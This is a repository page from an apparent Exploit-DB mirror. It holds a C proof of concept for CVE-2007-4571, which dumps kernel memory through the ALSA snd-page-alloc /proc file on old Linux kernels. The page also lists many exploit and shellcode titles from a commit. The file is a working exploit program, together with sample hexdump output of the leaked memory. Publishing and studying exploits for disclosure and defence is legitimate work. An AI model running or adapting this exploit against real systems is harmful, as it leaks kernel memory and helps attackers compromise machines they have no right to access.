bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/30605.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

69 lines
No EOL
3.9 KiB
C
Raw Blame History

/*
source: https://www.securityfocus.com/bid/25774/info
/*
The Linux kernel is prone to a local privilege-escalation vulnerability.
Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.
Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue.
*/
/*
*****************************************************************************************
* by Karimo_DM under GPL *
* *
* Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability *
* CVE-2007-4571 *
* *
* This simple PoF demonstrate how snd_page_alloc.c prior to Linux Kernel version *
* 2.6.22.8 (2.6.23-rc8) fails to boundary check a buffer in case of count=1 showing *
* parts of kernel memory (reaveling randomly some risky informations). *
* *
* karimo@localhost:~/src/c/bugs$ gcc -O2 cve20074571_alsa.c -ocve20074571_alsa *
* karimo@localhost:~/src/c/bugs$ ./cve20074571_alsa | hexdump -C *
* 00000000 00 03 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 |..UU'....P...P..| *
* 00000010 4f 53 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e |OSF00010020//.AN| *
* 00000020 53 49 5f 58 33 2e 34 2d 31 39 00 03 55 55 27 00 |SI_X3.4-19..UU'.| *
* 00000030 00 00 10 50 12 08 1e 50 12 08 4f 53 46 30 30 30 |...P...P..OSF000| *
* 00000040 31 30 30 32 30 2f 2f 00 41 4e 53 49 5f 58 33 2e |10020//.ANSI_X3.| *
* 00000050 34 2d 31 39 00 03 55 55 27 00 00 00 10 50 12 08 |4-19..UU'....P..| *
* 00000060 1e 50 12 08 4f 53 46 30 30 30 31 30 30 32 30 2f |.P..OSF00010020/| *
* 00000070 2f 00 41 4e 53 49 5f 58 33 2e 34 2d 31 39 00 03 |/.ANSI_X3.4-19..| *
* 00000080 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 4f 53 |UU'....P...P..OS| *
* 00000090 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e 53 49 |F00010020//.ANSI| *
* ... *
* 000051d0 00 02 20 00 78 ce ed da c0 43 93 c4 01 80 00 4d |.. .xÎíÚÀC.Ä...M| *
* 000051e0 71 88 9d 3c 04 27 0d 5d 80 ec 19 2f 12 8a 42 9d |q..<.'.].ì./..B.| *
* 000051f0 80 2e 9f c7 89 2c 87 ca 97 dd 50 8a e3 fa c3 15 |...Ç.,.Ê.ÝP.ãúÃ.| *
* 00005200 a2 3e 37 49 93 c4 01 80 00 4d 71 88 9d 3c 04 27 |¢>7I.Ä...Mq..<.'| *
* 00005210 0d 5d 80 ec 19 2f 12 8a 42 9d 80 2e 9f c7 89 2c |.].ì./..B....Ç.,| *
* 00005220 87 ca 97 dd 50 8a e3 fa c3 15 a2 3e 37 49 93 c4 |.Ê.ÝP.ãúÃ.¢>7I.Ä| *
* ... *
* *
* *
* [ Tested on a Slackware 12.0 running a self-compiled 2.6.21.3 Linux Kernel ] *
*****************************************************************************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#define _SOME_NUM 0xffff
int main() {
unsigned int j;
char kern_mem[2];
int fd=open("/proc/driver/snd-page-alloc",O_RDONLY);
for (j=0;j<(unsigned int)_SOME_NUM;j++) {
memset(kern_mem,0,2);
/* That 1 really do the job ;P */
if (!read(fd,kern_mem,1)) {
close(fd);
fd=open("/proc/driver/snd-page-alloc",O_RDONLY);
} else printf("%c",kern_mem[0]);
}
}
Reference in a new issue View git blame Copy permalink